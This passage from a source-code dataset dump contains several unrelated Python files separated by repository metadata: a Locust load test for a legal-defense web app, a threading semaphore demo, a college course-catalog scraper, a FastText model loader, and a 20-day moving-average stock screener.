"fechaAudiencia":"29/07/2016",
"horaAudiencia":"10:00",
"fundamentoLegal":"Fundamento legal de la audiencia",
"comentarios":"La Audiencia de ... se llevará a cabo con el fin de ...",
"causaMotivo":"",
"sintesisAudiencia":"Síntesis de la Audiencia ...",
"antecedente":"false",
"documentos": (documentos[i][0], open('Files/'+documentos[i][0], 'r'),documentos[i][1])
})
time.sleep(3)
self.client.post(url+"audiencia/"+idDefensa+"/0", data = m, headers={'Content-Type': m.content_type})
self.wait()
def acusacion(self, idDefensa, etapa, urlEtapa):
print("Crear la Etapa Procesal: "+etapa+" Para la defensa: "+str(idDefensa))
self.client.get(url+urlEtapa)
i = randrange(0,4)
print("Sube Documento "+documentos[i][0])
m = MultipartEncoder(
fields={
"fechaPresentacion":"20/07/2016",
"delitos":"111,149",
"clasificacionLegal":"Clasificación Legal de la Acusación",
"coadyuvanciaAcusacion":"false",
"delitosCoadyuvancia":"",
"fechaAudienciaIntermedia":"25/07/2016",
"horaAudienciaIntermedia":"17:00",
"documentos": (documentos[i][0], open('Files/'+documentos[i][0], 'r'),documentos[i][1])
})
time.sleep(3)
self.client.post(url+"acusacion/"+idDefensa, data = m, headers={'Content-Type': m.content_type})
self.wait()
def GuardarSituacionJuridicaDefensa(self):
idDefensa = findDefensa()
print("Guardar Situació Jurídica de Defensa para Mayores de Edad: "+str(idDefensa))
if idDefensa != 0:
self.client.post(url+"defensa/"+idDefensa, data = {
"edadDelito": "25",
"fechaInicioTermino":"16/07/2016",
"horaInicioTermino": "15:00",
"delitos":"311,48",
"observaciones":"El peticionario se encuentra en una situación ... Para lo cual se recomienda ...",
"defensorAsistio":"",
"defensoresAutorizados":""
})
self.wait()
crearEtapasProcesales(self, idDefensa)
def findDefensa():
defensaId = 0
try:
conn = mysql.connector.connect(user = variables.DB_USER, password=variables.DB_PASS, database = variables.DB_NAME, host =variables.DB_HOST)
except mysql.connector.Error as err:
if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:
print("Something is wrong with your user name or password")
elif err.errno == errorcode.ER_BAD_DB_ERROR:
print("Database does not exists")
else:
print(err)
else:
cursor = conn.cursor()
query = ("SELECT id FROM defensa WHERE usuario_id = 27 AND edad_delito is null")
print(query)
cursor.execute(query)
print(cursor)
available = []
for id in cursor:
print("VALUE %s" % str(id[0]) )
available.append(str(id[0]))
print(available)
print(len(available))
if len(available) != 0:
maxNumber = len(available)-1
if maxNumber == 0:
defensaId = available[maxNumber]
else:
defensaId = available[randrange(maxNumber)]
else:
defensaId = 0
print("No hay Defensas disponibles pendientes...")
cursor.close()
conn.close()
return defensaId
class UserTasks(TaskSet):
tasks = {
index:2,
verMisDefensas:2,
verDetalleDefensa:2,
GuardarSituacionJuridicaDefensa:2
}
def on_start(self):
login(self)
|
[
"evomatik@localhost.localdomain"
] |
evomatik@localhost.localdomain
|
839113b7423bd08946db266c62e3e63a9519e089
|
cbc5e5e32cdb04a16b3d2306f7d8dc265a86c47b
|
/py9/Test_Semaphore.py
|
0d640709f22e835dd46ded3338e1a7783df24eac
|
[] |
no_license
|
github-ygy/python_leisure
|
9821bd9feb6b5f05e98fd09ed1be1be56f3f8e35
|
f58ee2668771b1e334ef0a0b3e3fc7f6aacb8ccf
|
refs/heads/master
| 2021-01-23T06:15:27.715836
| 2017-10-31T16:56:44
| 2017-10-31T16:56:44
| 102,496,812
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 440
|
py
|
#!/usr/bin/env python
# author:ygy
import threading, time
def run(n):
semaphore.acquire() #信号量计数
print("run the thread: %s" % n)
time.sleep(1)
print("off the thread:%s" % n)
semaphore.release() #释放数量
# if __name__ == '__main__':
semaphore = threading.BoundedSemaphore(5) # 最多允许5个线程同时运行
for i in range(22):
t = threading.Thread(target=run, args=(i,))
t.start()
|
[
"ygyworkforit@163.com"
] |
ygyworkforit@163.com
|
5fb5b8bd13952aead969b606c55f76af216ae318
|
29b2475e4647756078eb2772c0d6b570ace0d933
|
/elmhurst_college.py
|
b13050c2d896a6e9d557274798e999436820fcb5
|
[] |
no_license
|
RDulepet19/Liberal-Arts-Index
|
a0f560b15d61940c63c8f4514d7a2a024bdfac8e
|
bc59811a8c0f0c27f56ebff25102977fea804260
|
refs/heads/master
| 2020-03-24T02:44:11.192802
| 2019-03-20T08:25:34
| 2019-03-20T08:25:34
| 142,388,394
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 24,707
|
py
|
# coding: utf-8
# MIT License
#
# Copyright (c) 2018 Riya Dulepet <riyadulepet123@gmail.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
# Thanks to the entire Columbia INCITE team for suggestions/recommendations, collaboration, critic, advice, and mentoring. This code was generated as part of internship @INCITE Columbia for Lit Index project.
# # Scraper for Elmhurst College Course Description
# ## Setup environment
# * Make sure Java is installed
# * Download [Apache Tika](http://apache.mirrors.ionfish.org/tika/tika-app-1.19.1.jar)
# ## Download Elmhurst College Course Descriptions
# * [Download Elmhurst College Course Description PDF](https://www.elmhurst.edu/wp-content/uploads/2018/06/Elmhurst-College-Catalog-2018-2019.pdf)
#
#
# ## Extract Plain Text file from PDF using Apache TIKA
# * java -jar tika-app-1.19.1.jar -t Elmhurst-College-Catalog-2018-2019.pdf > Elmhurst-College-Catalog-2018-2019.txt
#
# ### Extract manually exact name and unit ID
# [IPED website](https://nces.ed.gov/collegenavigator/?q=elmhurst&s=all&id=144962)
# * `UnitID` 144962
# * `Name` Elmhurst College
# In[9]:
INSTITUTION_ID = '144962'
INSTITUTION_NAME = 'Elmhurst College'
CATALOG_YEAR = '2018' # It's the 2018-2019 academic year catalog
CATALOG_URL = 'https://www.elmhurst.edu/wp-content/uploads/2018/06/Elmhurst-College-Catalog-2018-2019.pdf'
# ### Rules of extraction (for each department)
# * Sequence is important
# * Line starting with **COURSES** - Indicates start of course descriptions
# * Line starting with **FACULTY** - Indicates end of course descriptions
# * Department name is line that contains case-sensitive, for example ACCOUNTING (ACC) or ART HISTORY (ART) on its own
#
# ### Rules of Extraction (for each course)
# * Sequence is important
# * Line containing **Semester Hour(s)** at the end should be treated as new course
# * Ignore all empty lines
# * Example line in the format "WLE 101 Introduction to Outdoor Education 4 Semester Hours" is start of a new course
# * It should be broken into `Course Code` (alphanumeric), `Course Title` (string could be multiple words), `Credit Hours` (floating point number with decimal) **Credit Hours**
# * The next non-empty line should be treated as `Course Description` (some paragraph/multiple lines of text, should be combined into one line)
# * The `Course Description` can be used to parse out optionally, `Offerings`, `Prerequisites`, `Lessons`, `Labs`, and `Notes`
#
#
# ## Solution Architecture
# #### To extract desired Course Descriptions, we define primarily two classes:
# * `Department`
# * `Course`
# #### In addition:
# * `Department` is a container for number of `Course`(s)
# * `Departments` is a `list/collection` of `Department`
# #### Processing Methodology implements the Rules described earlier for parsing each `Department` and each `Course' within it
# In[10]:
import numpy as np
import re
# constants
# added manually following departments to map courses
MAP_DEPARTMENTS = {"ART":"Art", "BID":"Bidisciplinary", "BIO":"Biology", "MTH":"Math", "BUS":"Business", "ECO":"Economics", "CHM":"Chemistry", "COM":"Communication", "THE":"Theatre", "CSD":"Communication Sciences and Disorders", "CS":"Computer Science and Information Systems", "CGE":"Computer Game and Entertainment Technology", "IS":"Information Systems", "EDU":"Education", "ELM":"Elementary Education", "EYC":"Educating Young Children", "SEC":"Secondary Education", "SPE":"Special Education", "TEL":"Teaching English Learners", "ENG":"English", "GEO":"Geography", "POL":"Political Science", "HIS":"History", "HON":"Honors", "ICS":"Intercultural Studies", "SOC":"Sociology", "KIN":"Kinesiology", "MEH":"Medical Humanities", "AME":"Music", "MUS":"Music", "AMA":"Applied Music", "AMB":"Applied Music", "AMN":"Applied Music", "AMC":"Applied Music", "AMD":"Applied Music", "AMG":"Applied Music", "AMH":"Applied Music", "AMJ":"Applied Music", "AMO":"Applied Music", "AMP":"Applied Music", "AMS":"Applied Music", "AMT":"Applied Music", "AMV":"Applied Music", "AMW":"Applied Music", "NRS":"Nursing", "PHL":"Philosophy", "AST":"Astronomy", "PHY":"Physics", "PSY":"Psychology", "REL":"Religious Study", "CJ":"Criminal Justice", "URB":"Urban Studies", "ARB":"Arabic", "CHN":"Chinese", "FRN":"French", "GRM":"German", "JPN":"Japanese", "SPN":"Spanish", "WL":"World Languages", "CPP":"Professional Portfolio", "GIS":"Geographic Information Systems", "ISG":"Information Systems", "IT":"Information Technology", "SCM":"Supply Chain Management", "MBA":"Master of Business Administration", "MIT":"Masters in Information Technology", "MDS":"Masters in Data Science", "MEC":"Early Childhood Education", "MTL":"Masters in Teacher Leadership", "AGS":"Geographic Information Systems", "MPH":"Public Health", "MOT":"Occupational Therapy", "HCA":"Health Care", "MPM":"Project Management", "APH":"Human Geography", "MAT":"Master of Arts in Teaching"}
REGEX_START_DEPARTMENTS = r'^\s*COURSE DESCRIPTIONS\s*$'
PATTERN_REGEX_START_DEPARTMENTS = re.compile(REGEX_START_DEPARTMENTS)
REGEX_END_DEPARTMENTS = r'^BOARD OF TRUSTEES\s*$'
PATTERN_REGEX_END_DEPARTMENTS = re.compile(REGEX_END_DEPARTMENTS)
REGEX_DEPARTMENT_NAME = r'^([A-Z ]+)\s*\([A-Z]+\)\s*$'
PATTERN_REGEX_DEPARTMENT_NAME = re.compile(REGEX_DEPARTMENT_NAME)
REGEX_NEW_COURSE = r"^([A-Z]+)\s+([0-9]+)\s+([A-Z][\w\s\/–\-:'’,“®&]+)"
PATTERN_REGEX_NEW_COURSE = re.compile(REGEX_NEW_COURSE) #, re.IGNORECASE)
REGEX_IGNORE_NEW_COURSE = r'[\[\]]'
PATTERN_REGEX_IGNORE_NEW_COURSE = re.compile(REGEX_IGNORE_NEW_COURSE) #, re.IGNORECASE)
REGEX_DOCUMENT_HEADER = r'^\s*[0-9]+\s*$'
PATTERN_REGEX_DOCUMENT_HEADER = re.compile(REGEX_DOCUMENT_HEADER)
# In[20]:
import json
class Course:
'Common base class for all courses'
REGEX_OFFERINGS = r'Offered\s*(.*?)\.'
PATTERN_REGEX_OFFERINGS = re.compile(REGEX_OFFERINGS, re.IGNORECASE)
REGEX_NOT_OFFERINGS = r'Not Offered\s*(.*?)\.'
PATTERN_REGEX_NOT_OFFERINGS = re.compile(REGEX_NOT_OFFERINGS, re.IGNORECASE)
REGEX_PARTIAL_COURSE_NAME = r'^.*?\)\s+[A-Z]'
PATTERN_REGEX_PARTIAL_COURSE_NAME = re.compile(REGEX_PARTIAL_COURSE_NAME, re.IGNORECASE)
REGEX_PREREQUISITE = r'Prerequisite[s]*:\s*(.*?)\.'
PATTERN_REGEX_PREREQUISITE = re.compile(REGEX_PREREQUISITE, re.IGNORECASE)
REGEX_COREQUISITE = r'Co\-*requisite[s]*:\s*(.*?)\.'
PATTERN_REGEX_COREQUISITE = re.compile(REGEX_COREQUISITE, re.IGNORECASE)
REGEX_NOTES = r'Note[s]*:\s*(.*?)\.'
PATTERN_REGEX_NOTES = re.compile(REGEX_NOTES, re.IGNORECASE)
# make class JSON serializable
def toJSON(self):
return json.dumps(self, default=lambda o: o.__dict__,
sort_keys=True, indent=4)
def __repr__(self):
from pprint import pformat
return pformat(vars(self), indent=4, width=1)
def __init__(self, code = None, name = None, course_num = None, credit_hours = None):
# initialize class
self.code = code
self.name = name
self.credit_hours = "0.75"
self.course_num = course_num
# other member variables
self.offerings = ""
self.description = ""
self.prerequisites = ""
self.corequisites = ""
self.notes = ""
self.requirements = ""
def set_code(self, code):
self.code = code
def set_name(self, name):
self.name = name
def set_course_num(self, course_num):
self.course_num = course_num
def set_credit_hours(self, credit_hours):
self.credit_hours = credit_hours
def set_offering(self, offerings):
self.offerings = offerings
def check_and_update_offerings_description_lines(self, line):
# check if credit stuff mixed as first line in course description
credit_hours_regex = r"^([\d]*\.*[\d]*\s*[,tor\-–\s]*[\dtor,\-–\.\s]*)\s*[course]*\s*credits*"
credit_hours = re.findall(credit_hours_regex, line.strip())
if line.strip() in ['.50 credit, or 14 to 17 hours weekly for 1.00 credit.', '.25 credit or noncredit', '.50 credit; part-time', 'Non-credit; optional', '.25, .50 or .75 credit as needed to earn 8.50 credits', 'Noncredit', '(.50 credit)']:
self.credit_hours = line.strip()
elif len(credit_hours) > 0:
self.credit_hours = credit_hours[0]
else:
# handle case of incomplete course name that is mixed up as
# first line in course description assuming prior course name
# ends with space indicating partial name
if self.name.endswith(' '):
self.name += line
self.name = self.name.strip()
else:
self.description += " "
self.description += line
# In[21]:
import json
class Department:
'Common base class for all departments'
def __repr__(self):
from pprint import pformat
return pformat(vars(self), indent=4, width=1)
def __init__(self, institution_id = None, institution_name = None, catalog_year = None, url = None, name = None, num_of_courses = None):
# initialize class
self.institution_id = institution_id
self.institution_name = institution_name
self.catalog_year = catalog_year
self.url = url
self.department_name = name
self.courses = []
# make class JSON serializable
def toJSON(self):
return json.dumps(self, default=lambda o: o.__dict__,
sort_keys=True, indent=4)
def set_department_name(self, department_name):
self.department_name = MAP_DEPARTMENTS[department_name]
# print("\tMAP_DEPARTMENTS=", self.department_name)
def add_course(self, course):
self.courses.append(course)
def display_institution_id(self):
print ("Institution ID: %s" % self.institution_id)
def display_institution_name(self):
print ("Institution Name: %s" % self.institution_name)
def display_department_name(self):
print ("Department Name: %s" % self.department_name)
def display_number_of_courses(self):
print ("Number of Courses: %d" % len(self.courses))
# In[36]:
import pandas as pd
def dump_output(departments, file_to_save):
df_college = pd.DataFrame(columns=['ipeds_id', 'ipeds_name', 'catalog_year', 'url', 'subject', 'subject_code', 'course_number', 'description', 'course_name', 'credits', 'prereqs', 'corequisites_raw', 'offerings_raw', 'notes_raw', 'requirements_raw'])
for key, department in Departments.items():
for course in department.courses:
# handle only records with course description, otherwise ignore
course.description = course.description.strip()
if course.description and not course.description.endswith('courses chosen from:'):
# make sure course name doesn't contain multiple subject codes
course.name = course.name.split("(")[0].strip()
set_potential_course_codes = set(re.findall(r'\b([A-Z][A-Z\s]*[A-Z]|[A-Z])\b', course.name))
all_subject_codes = set(['ART', 'BID', 'BIO', 'MTH', 'BUS', 'ECO','CHM', 'COM', 'THE','CSD','CS','CGE','IS', 'EDU','ELM', 'EYC','SEC', 'SPE','TEL', 'ENG','GEO', 'POL', 'HIS', 'HON', 'ICS','SOC', 'KIN','MEH', 'AME','MUS', 'AMA', 'AMB', 'AMN','AMC', 'AMD','AMG', 'AMH','AMJ', 'AMO','AMP', 'AMS', 'AMT', 'AMV','AMW', 'NRS','PHL', 'AST','PHY', 'PSY', 'REL', 'CJ','URB', 'ARB','CHN', 'FRN', 'GRM','JPN', 'SPN','WL', 'CPP','GIS', 'ISG','IT', 'SCM','MBA','MIT', 'MDS', 'MEC','MTL', 'AGS','MPH', 'MOT','HCA', 'MPM', 'APH', 'MAT'])
if len(set_potential_course_codes & all_subject_codes) > 0:
# skip to next course since it is invalid course
continue
# skip courses that have course description less than 65 characters or
# if the course starts with [ or (, then ignore that course
# if (not re.search('^[\[\(]', course.description)) and (len(course.description) > 65):
# also ignore any content in paranthesis in course.name
df_college.loc[len(df_college)] = [department.institution_id, department.institution_name, department.catalog_year, department.url, department.department_name.strip(), course.code, course.course_num, course.description.strip(), course.name, course.credit_hours, course.prerequisites.strip(), course.corequisites.strip(), course.offerings.strip(), course.notes.strip(), course.requirements.strip()]
df_college.to_csv(file_to_save, index=False)
# In[37]:
import re, random
Departments = {}
all_departments_found = []
def main():
global INSTITUTION_ID, INSTITUTION_NAME, CATALOG_YEAR, CATALOG_URL
global Departments
found_new_course = False
# keep track of last two lines (to avoid false positives when identifying new course)
prev_prev_line = ""
prev_line = ""
current_course = None
fname = "Elmhurst-College-Catalog-2018-2019.txt"
#fname = "temp.txt"
with open(fname) as fp:
lines = fp.read().splitlines()
for i, line in enumerate(lines):
line = line.replace(u'\xa0', u' ')#.strip()
if 0 == len(line):
# empty line or maybe end of current course
found_new_course = False
continue
else:
# look for new course
new_course = PATTERN_REGEX_NEW_COURSE.findall(line)
if len(new_course) > 0:
if PATTERN_REGEX_IGNORE_NEW_COURSE.search(line):
# ignore false positive
continue
# print(new_course)
# so initialize fields for new course
# so initialize fields for new department, create new department if it doesn't exist
new_department = new_course[0][0].split()[0].strip()
# print("new_course=", new_course, "new_department=", new_department)
if new_department not in all_departments_found:
department = Department(INSTITUTION_ID, INSTITUTION_NAME, CATALOG_YEAR, CATALOG_URL)
try:
department.set_department_name(new_department)
except:
print("An unexpected error occurred, line=%s" % (line))
raise
Departments[new_department] = department
all_departments_found.append(new_department)
# create new course
course = Course()
course.set_code(new_course[0][0])
course.set_name(new_course[0][2])
course.set_course_num(new_course[0][1])
current_course = course
found_new_course = True
Departments[new_department].courses.append(course)
else:
# irrelevant line or update fields within the current course
if current_course and found_new_course:
# non-empty line, please assume everything is related to course description
current_course.check_and_update_offerings_description_lines(line)
# now iterate through all courses across all departments, and normalize all course
# descriptions by extracting Prerequisites, Notes, Offerings, Recommendations, Lecture/Labs,
for key, department in Departments.items():
for course in department.courses:
offerings_regex1 = r"\.\s+([AFSWQ]\w+\s+and\s+[A-Z]\w+)\."
offerings_regex2 = r"\.*\s+([AFSWQ]\w+)\."
offerings_regex3 = r"\.\s+([AFSWQ]\w+\s+\w+)\."
offerings_regex4 = r"\.\s+([AFSWQ]\w+\s+and\/or\s+[A-Z]\w+)\."
offerings_regex5 = r"\.\s+([AFSWQ]\w+\s+or\s+[A-Z]\w+)\."
offerings_regex6 = r"Scheduled for (.*?)\."
requirements_regex = r"\[(.*?)\]"
offerings_list1 = re.findall(offerings_regex1, course.description)
offerings_list2 = re.findall(offerings_regex2, course.description)
offerings_list3 = re.findall(offerings_regex3, course.description)
offerings_list4 = re.findall(offerings_regex4, course.description)
offerings_list5 = re.findall(offerings_regex5, course.description)
offerings_list6 = re.findall(offerings_regex6, course.description)
offerings_list1 = [x for x in offerings_list1 if re.search(r'alternate|years|year|available|annually|spring|fall|quarterly|semesterly|semester|quarter|summer|winter|[0-9]{4}', x, re.IGNORECASE)]
offerings_list2 = [x for x in offerings_list2 if re.search(r'alternate|years|year|available|annually|spring|fall|quarterly|semesterly|semester|quarter|summer|winter|[0-9]{4}', x, re.IGNORECASE)]
offerings_list3 = [x for x in offerings_list3 if re.search(r'alternate|years|year|available|annually|spring|fall|quarterly|semesterly|semester|quarter|summer|winter|[0-9]{4}', x, re.IGNORECASE)]
offerings_list4 = [x for x in offerings_list4 if re.search(r'alternate|years|year|available|annually|spring|fall|quarterly|semesterly|semester|quarter|summer|winter|[0-9]{4}', x, re.IGNORECASE)]
offerings_list5 = [x for x in offerings_list5 if re.search(r'alternate|years|year|available|annually|spring|fall|quarterly|semesterly|semester|quarter|summer|winter|[0-9]{4}', x, re.IGNORECASE)]
offerings_list6 = [x for x in offerings_list6 if re.search(r'alternate|years|year|available|annually|spring|fall|quarterly|semesterly|semester|quarter|summer|winter|[0-9]{4}', x, re.IGNORECASE)]
offerings_list = offerings_list1 + offerings_list2 + offerings_list3 + offerings_list4 + offerings_list5 + offerings_list6
course.offerings = ', '.join(offerings_list)
meet_requirements = re.findall(requirements_regex, course.description)
if len(meet_requirements) > 0:
course.requirements = meet_requirements[0]
if not course.offerings.strip():
val = course.PATTERN_REGEX_OFFERINGS.findall(course.description)
if len(val) > 0:
course.offerings = val[0]
val = course.PATTERN_REGEX_NOT_OFFERINGS.findall(course.description)
if len(val) > 0:
course.offerings = "Not offered " + val[0]
val = course.PATTERN_REGEX_PREREQUISITE.findall(course.description)
if len(val) > 0:
course.prerequisites = val[0]
val = course.PATTERN_REGEX_COREQUISITE.findall(course.description)
if len(val) > 0:
course.corequisites = val[0]
val = course.PATTERN_REGEX_NOTES.findall(course.description)
if len(val) > 0:
course.notes = val[0]
# In[38]:
# sampling test
def run_sample_test(random_department_index, random_course_index):
if -1 == random_department_index:
random_department_index = random.randint(0, len(Departments) - 1)
if -1 == random_course_index:
random_course_index = random.randint(0, len(Departments[random_department_index].courses) - 1)
# random_department_index = 14
# random_course_index = 32
print("random_department_index = ", random_department_index)
Departments[random_department_index].display_institution_id()
Departments[random_department_index].display_institution_name()
Departments[random_department_index].display_department_name()
Departments[random_department_index].display_number_of_courses()
print("random_course_index = ", random_course_index)
#print("actual courses=",len(departments[random_department_index]["courses"]))
print("courses length = ", len(Departments[random_department_index].courses))
print("\tcourse name = ", Departments[random_department_index].courses[random_course_index].name)
print("\tcourse code = ", Departments[random_department_index].courses[random_course_index].code)
print("\tofferings = ", Departments[random_department_index].courses[random_course_index].offerings)
print("\tcourse description = ", Departments[random_department_index].courses[random_course_index].description)
# print(Departments[random_department_index].courses[random_course_index])
print("\tprerequisites = ", Departments[random_department_index].courses[random_course_index].prerequisites)
print("\tnotes = ", Departments[random_department_index].courses[random_course_index].notes)
# In[39]:
if __name__== "__main__":
main()
dump_output(Departments, "data/elmhurst_college_raw.csv")
# In[ ]:
run_sample_test(-1, -1)
# In[ ]:
x = "ENG 105 an approved statistics course and one college-level"
lst = set(re.findall(r'\b([A-Z][A-Z\s]*[A-Z]|[A-Z])\b', x))
all_subject_codes = set(['ART', 'BID', 'BIO', 'BUS', 'ECO', 'CHM', 'COM', 'THE', 'CSD', 'CGE', 'CS', 'IS', 'EDU', 'ELM', 'EYC', 'SEC', 'SPE', 'TEL', 'ENG', 'GEO', 'HIS', 'HON', 'ICS', 'KIN', 'MTH', 'MEH', 'AME', 'MUS', 'AMB', 'AMC', 'AMD', 'AMN', 'NRS', 'PHL', 'AST', 'PHY', 'POL', 'PSY', 'REL', 'SOC', 'CJ', 'URB', 'CHN', 'FRN', 'GRM', 'JPN', 'SPN', 'WL', 'CPP', 'GIS', 'ISG', 'IT', 'SCM', 'MBA', 'MIT', 'MDS', 'MEC', 'MTL', 'AGS', 'MPH', 'MOT', 'HCA', 'MPM', 'APH'])
len(lst & all_subject_codes)
# In[ ]:
MAP_DEPARTMENTS["MTH"]
# In[32]:
class xClass:
val = -1;
def __init__(self, val):
self.val = val
arrXClass = {}
a = xClass(10)
b = xClass(20)
arrXClass["a"]=a
arrXClass["b"]=b
# In[33]:
print(arrXClass)
# In[35]:
a.val = 40
for key, obj in arrXClass.items():
#for obj in arrXClass:
print(obj.val)
# In[ ]:
aa=None
if aa:
print("fund")
else:
print("notfund")
|
[
"noreply@github.com"
] |
RDulepet19.noreply@github.com
|
0f9da5641c14d6d47418ae74359cbd602a3a8681
|
178eb0567fd21b65df6f95d7342d971fb253f91e
|
/AI/Classifiers/models/load.py
|
d0adbb5c1c02bded01575f019398c91e8808eb4a
|
[] |
no_license
|
Zhaofan-Su/SemanticAnalysis
|
defacbcde5f6c541de9c4cfa37138a449c03ce60
|
f28813bf21d6170ffe826dd7edcad73cc244da9b
|
refs/heads/master
| 2020-05-07T11:59:15.138559
| 2019-04-23T00:53:45
| 2019-04-23T00:53:45
| 180,484,689
| 0
| 0
| null | 2019-04-17T02:46:54
| 2019-04-10T02:20:34
|
Python
|
UTF-8
|
Python
| false
| false
| 2,124
|
py
|
import os
import torch
import torch.nn.functional as F
import datetime
import torch.autograd as autograd
import jieba.posseg as pseg
from .fasttext import FastText
import torchtext.data as data
from .input import Dataset
from torchtext.vocab import Vectors
import os.path as path
def _chinese_tokenizer(sentence):
exclusion = ["e", "x", "y"] # e 叹词 x 非语素词 y 语气词
return [word for (word, flag) in pseg.cut(sentence) if flag not in exclusion]
def load_data(target, config):
text_field = data.Field(tokenize=_chinese_tokenizer)
label_field = data.Field(sequential=False)
train_data, test_data = Dataset.split(target, text_field, label_field, config)
embedding = path.join(path.dirname(path.abspath(__file__)), config.PRETRAINED_EMBEDDING)
cache = path.join(path.dirname(path.abspath(__file__)), ".vector_cache/")
weights = Vectors(name=embedding, cache=cache)
text_field.build_vocab([{key: 1} for key in weights.itos], vectors=weights)
label_field.build_vocab(train_data)
config.EMBED_NUM = len(text_field.vocab)
config.EMBED_DIM = len(weights.vectors[0])
config.CLASS_NUM = len(label_field.vocab) - 1
return text_field, label_field
def load_model(model_name, ckpt, text_field, config):
model = None
if model_name == "FastText":
model = FastText(config, text_field.vocab.vectors)
if config.CUDA:
torch.cuda.set_device(config.DEVICE)
model = model.cuda()
device = config.DEVICE if config.CUDA else "cpu"
model.load_state_dict(torch.load(path.join(path.dirname(path.abspath(__file__)), ckpt), map_location=device))
return model
def predict(model, text_field, label_field, sentence, config):
model.eval()
sentence = text_field.preprocess(sentence)
# while len(sentence) < 3:
# sentence.append("<pad>")
sentence = [[text_field.vocab.stoi[x] for x in sentence]]
x = torch.tensor(sentence)
x = autograd.Variable(x)
if config.CUDA:
x = x.cuda()
output = model(x)
_, pred = torch.max(output, 1)
return label_field.vocab.itos[pred.data[0]+1] == "0"
|
[
"nee_11235@qq.com"
] |
nee_11235@qq.com
|
a2996d418df380689d0ce270efb07b78628d4bc2
|
6f98d1667a5c9d55d0a74dcee77b5c3c777653a5
|
/source/ma20/analysis_stock.py
|
8f57162586da3109aaf4f8b18d1301f607c63bb7
|
[] |
no_license
|
llzhi001/stock_strategy
|
55efec1ed95d9ba862fd71f705a5cca8ad3af751
|
237f9ccda0c806f06b99374a5680c5cb70c07899
|
refs/heads/master
| 2020-12-08T13:19:59.083121
| 2018-04-03T17:09:54
| 2018-04-03T17:09:54
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,643
|
py
|
# coding=utf-8
'''
Created on Nov 7, 2017-12:40:31 AM
@author: yubangwei_pc
'''
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import os
import tushare as ts
from datetime import datetime
# 考虑拟合20天均线,取导数?
m20_para = {'not_rising_days':5, #连续not_rising_days多天不上涨,说明20天均线横盘或者下跌
'const_rising_days':3 # 连续const_rising_days多天上涨,说明20天均线开始上涨
}
def is_rising(his_data_df, judge_para='ma20', const_times=3):
'''
连续not_rising_days次不增加,紧接着连续const_rising_days次递增,认为是增长的,出现拐点
:功能要单一,只判断上升沿,或者下降沿
'''
if None is his_data_df:
return False
recent_risng_days_th = const_times
if len(his_data_df) < recent_risng_days_th :
return False
for i in range(recent_risng_days_th):
if his_data_df[judge_para][0+i] <= his_data_df[judge_para][1+i]:
return False
return True
def is_not_rising(his_data_df, judge_para='ma20', const_not_rising_times=5):
if None is his_data_df:
return False
if len(his_data_df) < const_not_rising_times :
return False
for i in range(const_not_rising_times):
if his_data_df[judge_para][0+i] > his_data_df[judge_para][1+i]:
return False
return True
def update_stock_code():
with open('.\\stock_code.txt', 'r') as fid:
try:
stock_code_id = fid.readlines()
record_date = stock_code_id[-1]
record_date = pd.Timestamp(record_date)
now_date = pd.Timestamp(datetime.now())
diff_date = now_date - record_date
if (diff_date.days < 20):
return
except:
print("Cannot get date information from stock file")
print("Updating the stocks id from network(...)")
# 上次刷新股票编号的时间超过20天,重新再刷一次
with open('.\\stock_code.txt', 'w+') as fid:
stock_code_df = ts.get_today_all()
for i in stock_code_df.index:
fid.write('%s, %s\n'%(stock_code_df['code'][i], stock_code_df['name'][i]))
fid.write(datetime.now().strftime('%Y-%m-%d'))
def get_all_stock_id_and_name():
'''
返回: id:name形式的字典
'''
update_stock_code()
with open('.\\stock_code.txt', 'r') as fid:
stock_code_id = fid.readlines()
stock_code_id = stock_code_id[:len(stock_code_id)-1]# 最后一行保存的是刷新时间
stock_id_name_info = dict()
for stock_id_name in stock_code_id:
stock_id = stock_id_name.strip().split(',')[0]
stock_name = stock_id_name.strip().split(',')[1]
stock_id_name_info[stock_id] = stock_name
return stock_id_name_info
def Ma20_rising_strategy():
'''根据ma20曲线拐点决定买入还是卖出:如果出现横盘或者下跌就卖出;如果出现上升,就买进。具体是否上升需要参数判断m20_para.
将需要买入的股票编号及其20天均线保存
参考 http://blog.sina.com.cn/s/blog_b598fcc90102xi1d.html
'''
with open('.\\stock_code.txt', 'r') as fid:
stock_code_id = fid.readlines()
stock_code_id = stock_code_id[:len(stock_code_id)-1]# 最后一行保存的是刷新时间
print("The following stocks' 20ma are rising:")
ma20_rising_file = open('.\\ma20\\m20_rising_stocks.txt', 'w+')
for stock_id_name in stock_code_id:
stock_id = stock_id_name.strip().split(',')[0]
stock_name = stock_id_name.strip().split(',')[1]
try:
his_data_df = ts.get_hist_data(stock_id)# 获取的数据是从当前时间开始的倒叙
except:
print("Cannot get %s his data."%stock_id)
continue
if is_rising(his_data_df, 'ma20', m20_para['const_rising_days']) and \
is_not_rising(his_data_df[m20_para['const_rising_days']:], 'ma20', m20_para['not_rising_days']):
print('%s'%stock_id)
plt.plot(his_data_df['ma20'][100:0:-1])# 获取的数据是从当前时间开始的倒叙
#plt.show()
fig_name = '.\\ma20\\%s_%s.png'%(stock_id, stock_name)
plt.savefig(fig_name)
plt.close()
ma20_rising_file.write('%s\n'%stock_id_name)
print('code: %s'%(stock_id_name))
ma20_rising_file.close()
if __name__ == '__main__':
update_stock_code()
Ma20_rising_strategy()
|
[
